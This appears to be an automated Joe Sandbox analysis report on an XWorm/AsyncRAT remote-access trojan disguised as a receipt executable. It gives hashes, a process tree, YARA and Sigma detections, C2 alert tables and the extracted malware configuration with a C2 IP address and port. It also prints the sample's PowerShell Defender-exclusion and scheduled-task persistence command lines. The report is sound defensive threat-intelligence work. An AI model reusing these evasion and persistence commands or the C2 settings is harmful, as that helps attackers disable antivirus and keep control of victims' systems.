Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Recaipt202431029.exe

Overview

General Information

Sample name:Recaipt202431029.exe
Analysis ID:1580358
MD5:7b8044f78e70383a436ebbae2df47808
SHA1:002de1bb6aa1d9ef1a3f107cb7f5615be50f27a7
SHA256:b10e44ddfe6caff1127a964d4a5b9ebdbf9e92a24c2a2957e044dd45b14e8967
Tags:AsyncRATexeRATuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Recaipt202431029.exe (PID: 5548 cmdline: "C:\Users\user\Desktop\Recaipt202431029.exe" MD5: 7B8044F78E70383A436EBBAE2DF47808)
    • powershell.exe (PID: 2232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1412 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Recaipt202431029.exe (PID: 612 cmdline: "C:\Users\user\Desktop\Recaipt202431029.exe" MD5: 7B8044F78E70383A436EBBAE2DF47808)
  • JvkAPBBIe.exe (PID: 1532 cmdline: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe MD5: 7B8044F78E70383A436EBBAE2DF47808)
    • schtasks.exe (PID: 3168 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • JvkAPBBIe.exe (PID: 1560 cmdline: "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe" MD5: 7B8044F78E70383A436EBBAE2DF47808)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["172.245.244.69"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x87d5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8872:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8987:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8367:$cnc4: POST / HTTP/1.1
    00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x77025:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x99845:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x770c2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x998e2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x771d7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x999f7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x76bb7:$cnc4: POST / HTTP/1.1
      • 0x993d7:$cnc4: POST / HTTP/1.1
      0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 10 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Recaipt202431029.exe.3630650.3.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.Recaipt202431029.exe.3630650.3.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x51d5:$str01: $VB$Local_Port
          • 0x51c6:$str02: $VB$Local_Host
          • 0x548a:$str03: get_Jpeg
          • 0x4eb3:$str04: get_ServicePack
          • 0x61f7:$str05: Select * from AntivirusProduct
          • 0x63f3:$str06: PCRestart
          • 0x6407:$str07: shutdown.exe /f /r /t 0
          • 0x64b9:$str08: StopReport
          • 0x648f:$str09: StopDDos
          • 0x6585:$str10: sendPlugin
          • 0x6723:$str12: -ExecutionPolicy Bypass -File "
          • 0x684c:$str13: Content-length: 5235
          0.2.Recaipt202431029.exe.3630650.3.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6bd5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6c72:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6d87:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6767:$cnc4: POST / HTTP/1.1
          0.2.Recaipt202431029.exe.3652e70.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.Recaipt202431029.exe.3652e70.1.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x51d5:$str01: $VB$Local_Port
            • 0x51c6:$str02: $VB$Local_Host
            • 0x548a:$str03: get_Jpeg
            • 0x4eb3:$str04: get_ServicePack
            • 0x61f7:$str05: Select * from AntivirusProduct
            • 0x63f3:$str06: PCRestart
            • 0x6407:$str07: shutdown.exe /f /r /t 0
            • 0x64b9:$str08: StopReport
            • 0x648f:$str09: StopDDos
            • 0x6585:$str10: sendPlugin
            • 0x6723:$str12: -ExecutionPolicy Bypass -File "
            • 0x684c:$str13: Content-length: 5235
            Click to see the 10 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", ProcessId: 2232, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", ProcessId: 2232, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Recaipt202431029.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe, ParentImage: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe, ParentProcessId: 1532, ParentProcessName: JvkAPBBIe.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp", ProcessId: 3168, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", ProcessId: 1488, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe", ProcessId: 2232, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Recaipt202431029.exe", ParentImage: C:\Users\user\Desktop\Recaipt202431029.exe, ParentProcessId: 5548, ParentProcessName: Recaipt202431029.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp", ProcessId: 1488, ProcessName: schtasks.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:27:29.137140+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:27:34.318395+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:27:42.161478+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:27:55.176764+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:04.239989+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:08.110138+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:17.962675+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:18.154571+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:30.317032+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:33.489741+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:33.681536+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:34.332061+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:44.253983+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:51.800841+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:28:53.785176+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:02.974065+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:04.441147+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:04.863672+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:05.262060+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:06.284365+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:11.643652+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:17.315188+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:17.582556+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:19.190382+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:24.783837+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:34.346903+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:37.846437+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:38.050741+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:48.736479+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:54.502249+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:29:55.330883+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:04.073227+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:04.314256+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:06.173980+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:10.298346+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:10.490367+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:15.438980+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:15.642570+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:15.876503+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:28.698540+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:31.704643+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:31.962577+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:34.360302+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:36.784873+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:37.439402+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:37.642142+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:37.754785+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:37.876731+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:38.735990+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:42.220836+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:42.900893+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:52.125723+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:53.346873+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:53.547373+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:54.158191+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:30:58.641803+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:31:04.360023+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:31:06.579489+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            2024-12-24T11:31:10.562881+010028528701Malware Command and Control Activity Detected172.245.244.695200192.168.2.549710TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T11:27:29.157026+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:27:42.163195+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:27:55.182702+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:08.111637+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:17.964947+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:18.156536+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:30.322102+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:33.797868+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:33.917464+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:44.258854+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:51.812752+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:28:53.788402+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:02.975687+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:05.264129+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:05.551152+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:06.288161+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:11.645831+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:17.316966+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:17.584264+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:17.776910+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:17.896637+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:19.192354+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:24.786409+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:37.852594+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:38.052245+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:48.738135+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:54.512232+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:29:55.332454+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:04.077044+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:06.175853+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:10.299985+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:10.495047+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:15.440562+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:15.644058+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:15.878620+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:28.701122+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:31.706258+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:31.964910+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:32.158493+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:32.280984+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:36.790933+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:37.443240+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:37.643551+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:37.763343+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:37.882998+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:38.737479+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:42.224585+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:42.909048+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:52.129017+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:53.348716+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:53.549068+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:54.162909+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:30:58.643299+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:31:06.582926+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP
            2024-12-24T11:31:10.563870+010028529231Malware Command and Control Activity Detected192.168.2.549710172.245.244.695200TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
